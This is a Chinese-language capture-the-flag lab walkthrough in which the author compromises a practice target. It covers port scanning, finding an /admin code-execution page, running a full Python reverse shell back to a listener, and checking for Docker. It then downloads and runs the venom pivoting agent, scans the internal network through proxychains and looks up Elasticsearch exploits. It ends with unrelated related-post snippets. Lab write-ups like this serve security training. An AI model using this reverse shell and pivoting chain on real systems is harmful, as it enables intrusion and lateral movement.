【安全牛】一起来打靶第一周笔记
【安全牛】一起来打靶第一周笔记
- 扫描端口
nmap -p- 192.168.0.100
masscan --port 1-65535 192.168.0.100 --rate=10000
- 探测端口服务
nmap -p22,5000 -sV 192.168.0.100
- 查看5000端口
没有发现什么突破点 - 爆破路径
dirsearch -u http://192.168.0.100:5000
爆破出路径 /admin - 访问 http://192.168.0.100:5000/admin
是一个·代码执行界面。 - 可以执行代码,于是就可以反弹shell
接收端kali 建立监听: nc -nvlp 4444 监听4444端口
将反弹代码放入执行
反弹代码如下
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.168.13",4444));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);
反弹成功!
查看基本内容
发现docker文件,初步判断是docker环境
7. 进一步判断是不是为docker容器
查看根目录是否有“.dockerenv”文件。
ls /.dockerenv
查看 /proc/1/cgroup
cat /proc/1/cgroup
- 用ping命令扫描其他ip
脚本如下:
for i in $(seq 1 10); do ping -c 172.17.0.$i; done
可以看到172.17.0.1、172.17.0.2、172.17.0.3(自己)回包了
9. 内网穿透
运用到工具venom
下载链接:venom下载链接
kali使用venom:
攻击机使用:admin_linux_x64
./admin_linux_x64 -lport 6666
靶机使用:agent_linux_x64
首先要将agent_linux_x64传入靶机,方法如下:
kali开启http服务,靶机下载
kali开启服务:python3 -m http.server 80
靶机下载:wget http:10.106.0.20/agent_linux_x64
赋予执行权限 chmod +x agent_linux_x64
执行: ./agent_linux_x64 -rhost 10.106.0.20 -rport 6666
成功。
show命令查看。
goto 1 goto到节点
socks 1080 设置代理端口
venom设置代理成功。
10. 使用代理
使用工具:proxychains
更改配置文件: sudo vi /etc/proxychains4.conf
将socks4 1270.0.1 9050
改为socks5 127.0.0.1 1080 设置代理的端口
11. 扫描各ip端口开放
proxychains nmap -Pn -sV -sT 172.17.0.1
-Pn:不进行ping扫描
-sP : 用ping扫描判断主机是否存活,只有主机存活,nmap才会继续扫描,一般最好不加,因为有的主机会禁止ping
-sV: 指定让Nmap进行服务版本扫描
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon 扫描
发现 172.17.0.2 开放 9200 端口
12. 9200端口开放的是Elasticsearch(一个框架)
框架漏洞的利用:
searchsploit Elasticsearch
cp /usr/share/exploitdb/exploits/… .
查看脚本,进行提权。
漏洞利用链接:Elasticsearch漏洞利用链接
提权失败!玩不了!结束!
【安全牛】一起来打靶第一周笔记相关推荐
- biostar handbook: 第一周笔记汇总+第二周任务布置
第一周笔记汇总 昨天和一位也在自学生信的同学交流自学的心境,他在我的唆使之下也在简书更新自己的笔记,可以搜索小郑的学习笔记.期间,他说道 非常庆幸自己能够坚持把自己学到的知识和困惑以文字的形式记录下来 ...
- vulhub打靶第一周
title: vulhub打靶第一周 description: vulhub打靶第一周 难度:middle date: 2023-06-01 categories: [渗透,靶机] 图片链接有问题访问 ...
- 计算机图形学多边形填充代码_计算机图形学 Computer Graphics (第一周笔记及课件翻译)...
本文使用 Zhihu On VSCode 创作并发布 注:本文部分内容源自于UDE课程 Computer Graphics(Prof. Dr. Jens Krüger),仅供本人自己学习与作为课程笔记 ...
- Boolan第一周笔记(二)对于第一周作业的一点总结
本文主要总结下面的问题: 1.为什么这周的作业里面,创建数组的时候使用堆内存更好: 2.指针指向不同类型走的步数不同. 第一周作业内容如下,题目来自Boolan: 为Date类实现如下成员: 1. 构 ...
- PaddlePaddle课程学习第一周笔记
人工智能.机器学习.深度学习的关系 机器学习的过程分为假设.评价和优化三个阶段: 假设:通过观察加速度a和作用力F的观测数据,假设aaa和FFF是 线性关系,即a=w∗Fa = w * Fa=w∗F. ...
- Python语言程序设计(嵩天老师版)第一周笔记
一.程序设计 1.计算机是根据指令操作的设备. (1)计算机具有功能性和可编程性.二者缺一,就不叫计算机了. 功能性指的是对数据操作,表现为数据计算.输入输出处理和结果存储: 可编程性指根据一些列指令 ...
- 我滴python第一周笔记
我的第一节python课~~~ 穹妹镇楼 为了巩固知识点,回顾总结之前先看一个好东西: 对象类型 类型名称 示例 简要说明 数字 int.float.complex 1234, 3.14, 1.3e5 ...
- 吴恩达卷积神经网络课程——第一周笔记
Week 1 目录 Week 1 1-1.计算机视觉 1-2.边缘检测示例 1-3.更多关于边缘检测内容 1-4.Padding 1-5.卷积步长 1-6.卷积为何有效 1-7.单层卷积网络 1-8. ...
- 工作室课题-第一周笔记
通过一周的练习 复习到了很多的知识 比如:冒泡排序 选择排序等等 用代码块的方式来呈现最近学到的以及复习到的知识点 递归搜索: void DFS(int x) {if(x==n&&Ju ...
- 《Linux内核分析》第一周笔记 计算机是如何工作的
一.计算机是如何工作的? 1.存储程序计算机工作模型 1)冯诺依曼体系结构 学习研究计算机的基本概念.就是指存储程序计算机.所有的有计算功能的电子设备小到计算器,大到超级计算机核心部分都可以用这种体系 ...
最新文章
- Activity启动流程:Hook实现启动未注册Activity
- docker 挂载空间到docker
- Android中的HTTP请求
- POJ2503 Babelfish map或者hash_map
- spring字符串判空_字符串工具类StringUtils实现字符串是否中文、字符串分割/判空/替换/查找、是否包含乱码及字符串数组合并等常规操作...
- 2020年什么编程语言最受欢迎,待遇最高?
- 台式电脑计算机能创建新磁盘吗,解决方案:如何添加硬盘以扩展台式计算机上的存储空间|如何对新添加的硬盘进行分区...
- Single Responsibility Principle (SRP) - OO设计的单一职责原则
- 让你的Android应用与外部元素互动起来
- office是python打开方式_Python读取word文本操作详解
- 简单使用MATLAB自带的遗传算法工具箱
- 正式版TBSA 6.0(用来分析多层及高层建筑结构的专用程序)
- photo cs6 2018破解教程
- html梯形选项卡,梯形标签页
- 文本分析简历项目收集-----机器学习(仅供参考)
- win10注册MSCOMM32控件及简单使用
- 新产品发布 | HawkEye作业票管理系统
- 合肥工业大学宣城校区2020年-2021年第一(大四上)学期物联网工程专业资料汇总(含课件、个人实验报告、实验代码、课设报告等)
- php中注册数字插不进去,进php数字
- git分支branch详解